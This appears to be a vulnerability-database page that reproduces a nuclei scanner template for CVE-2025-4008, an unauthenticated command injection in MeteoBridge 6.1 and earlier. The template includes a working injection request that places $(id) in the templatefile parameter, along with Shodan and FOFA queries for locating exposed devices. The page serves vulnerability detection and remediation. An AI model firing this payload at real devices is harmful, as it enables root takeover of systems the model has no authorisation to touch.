Lucene search
+L

MeteoBridge <= 6.1 - Remote Code Execution

🗓️ 26 Oct 2026 02:10:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 148 Views

MeteoBridge <= 6.1 allows remote code execution due to command injection vulnerability.

Related
Refs
Code
ReporterTitlePublishedViews
Family
bdu_fstec
BDU FSTEC
Meteobridge template.cgi Bypass Privilege Execution
3 Jun 202500:00
–bdu_fstec
circl
Circl
CVE-2025-4008
21 May 202515:42
–circl
cisa_kev
CISA KEV Catalog
Smartbedded Meteobridge Command Injection Vulnerability
2 Oct 202500:00
–cisa_kev
cisa
CISA
CISA Adds Five Known Exploited Vulnerabilities to Catalog
2 Oct 202512:00
–cisa
cnnvd
CNNVD
Meteobridge security vulnerabilities
21 May 202500:00
–cnnvd
cve
CVE
CVE-2025-4008
21 May 202515:31
–cve
cvelist
Cvelist
CVE-2025-4008 Arbitrary Command Injection in Smartbedded MeteoBridge
21 May 202515:31
–cvelist
euvd
EUVD
EUVD-2025-16032
21 May 202515:31
–euvd
kittysploit
KittySploit
MeteoBridge <= 6.1 - Remote Code Execution Detection
28 Jul 202611:27
–kittysploit
nvd
NVD
CVE-2025-4008
21 May 202516:15
–nvd
Rows per page
id: CVE-2025-4008

info:
  name: MeteoBridge <= 6.1 - Remote Code Execution
  author: iamnoooob,pdresearch
  severity: high
  description: |
    The Meteobridge web interface let meteobridge administrator manage their weather station data collection and administer their meteobridge system through a web application written in CGI shell scripts and C.This web interface exposes an endpoint that is vulnerable to command injection.Remote unauthenticated attackers can gain arbitrary command execution with elevated privileges ( root ) on affected devices.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands with root privileges through the templatefile parameter, achieving complete device compromise.
  remediation: |
    Upgrade MeteoBridge to version 6.2 or later that properly sanitizes input in template.cgi.
  reference:
    - https://forum.meteohub.de/viewtopic.php?t=18687
    - https://www.onekey.com/resource/security-advisory-remote-command-execution-on-smartbedded-meteobridge-cve-2025-4008
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4008
  classification:
    cve-id: CVE-2025-4008
    cvss-score: 7.5
    cwe-id: CWE-77
    epss-score: 0.93315
    epss-percentile: 0.99836
  metadata:
    verified: true
    shodan-query: "meteobridge"
    fofa-query: "Meteobridge"
  tags: cve,cve2025,meteobridge,rce,kev,vkev,vuln

http:
  - raw:
      - |
        GET /public/template.cgi?templatefile=$(id) HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Error: template file'
          - 'uid='
          - 'gid='
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b440172aad8a00d7c20cbed39a7bd94b4989b6055734c3fec3f90b34617771e2022100c7c4128d5e118311322bfb53f7a5b2f64c062353c7714036fdaf5b5b8d2ea3d5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.6High risk
Vulners AI Score8.6
CVSS 3.18.8
CVSS 48.7
EPSS0.93315
SSVC
148